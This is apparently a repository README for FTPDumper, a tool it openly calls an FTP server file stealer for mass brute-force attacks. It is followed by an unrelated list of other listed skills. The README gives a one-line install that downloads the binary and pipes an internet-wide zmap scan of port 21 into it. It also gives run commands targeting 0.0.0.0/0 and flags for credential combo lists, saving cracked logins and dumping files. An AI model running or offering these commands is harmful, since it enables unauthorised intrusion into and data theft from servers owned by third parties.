FTPDumper
⚡ Scan World FTP Servers and get Their Data 🌍
Install / Use
/learn @MatrixTM/FTPDumperREADME
<p align="center"><img src="https://i.imgur.com/H39uBH3.png" width="1040" alt="features"></p>
📖 What is FTPDumper ?
FTPDumper is an easy-to-use yet advanced FTP server file stealer. It can be utilized in massive FTP brute-force attacks, supporting various formats such as combo, pipe input, CIDR, files, and even a single IP address.
FTPDumper boasts a plethora of features, including:
- 💡 Anti-Fake File Detection: Utilizes advanced algorithms to detect and prevent the extraction of counterfeit files.
- 🔍 Self-Implemented Scanner: Employs an internally developed scanning mechanism to ensure thoroughness and efficiency.
- 🖥️ Modern and Sleek User Interface: Offers a visually appealing and user-friendly interface for seamless navigation and operation.
- ⚡ Fast and Memory-Safe Operation: Executes operations swiftly while maintaining optimal memory usage to prevent system slowdowns or crashes.
- 🤝 Smart Connection and Timeout Management: Implements intelligent connection strategies and timeout configurations to maximize accuracy and resource utilization.
Use it at your own RISK!
🔍 Overview
- 🚀 Quickstart
- ⚙️ Arguments
- 👨💻 Best Way to get a server
🚀 Quickstart
One-Line Install And Running on Fresh VPS
apt update && apt install -y zmap && wget -q $(curl -s https://api.github.com/repos/MatrixTM/FTPDumper/releases/latest | grep browser_download_url | grep "FTPDumper" | cut -d '"' -f 4) && chmod +x FTPDumper && zmap -p 21 -B 50MB -q | ./FTPDumper -l 5000
<details>
<summary><b>🔧 Manual Installation</b></summary>
<h3> 1. Download FTPDumper </h3>
<p>Download FTPDumper from <a href="https://github.com/MatrixTM/FTPDumper/releases">Releases</a></p>
<h3> 2. Set Up Permission </h3>
Set up permission to FTPDumper binary file.
chmod +x FTPDumper
<h3> 3. Run FTPDumper </h3>
You have a few ways to use FTPDumper.
- Zmap
- Download Zmap
sudo apt install zmap- Run FTPDumper (Zmap)
zmap -p 21 -q | ./FTPDumper -l 500 -save- Run FTPDumper (DevWay)
Check out Arguments to see more./FTPDumper -l 500 -save -s 0.0.0.0/0
⚙️ Arguments
MatrixTM@FTPDumper: ./FTPDumper --help
FTPDumper - Scan World FTP Servers and Steal Their Data
Flags:
--version Displays the program version string.
-h --help Displays help with available flag, subcommand, and positional value parameters.
-scan --scanner Ip/CIDR scanner (stdin|filename|cidr|ip) (default: stdin)
-c --combo Combo File (user:password)
-p --ports Ports Split by , (Default Port: 21)
-o --output Output Folder (default: files)
-f --formats File Formats Split by , (Default Format: all)
-l --limit Task limit (default: 10)
-t --timeout Timeout in seconds (default: 5s)
-s --save Save Credentials in hit.txt
-v --verbose Verbose Mode
| Argument | Description | Default Value | |------------------|---------------------------------------------------------------------------------|:-------------:| | --version | Displays the program version string. | None | | -h, --help | Displays help with available flag, subcommand, and positional value parameters. | None | | -scan, --scanner | IP/CIDR scanner [stdin|filename|cidr|ip] stdin | stdin | | -c, --combo | Combo File (user:password) | anonymous | | -p, --ports | Ports Split by , | 21 | | -o, --output | Output Folder files | files | | -f, --formats | File Formats Split by , | all | | -l, --limit | Task limit | 10 | | -t, --timeout | Timeout in seconds | 5s | | -s, --save | Save Credentials in hit.txt | False | | -v, --verbose | Verbose Mode | False |
Related Skills
node-connect
337.4kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
83.2kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
337.4kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
commit-push-pr
83.2kCommit, push, and open a PR
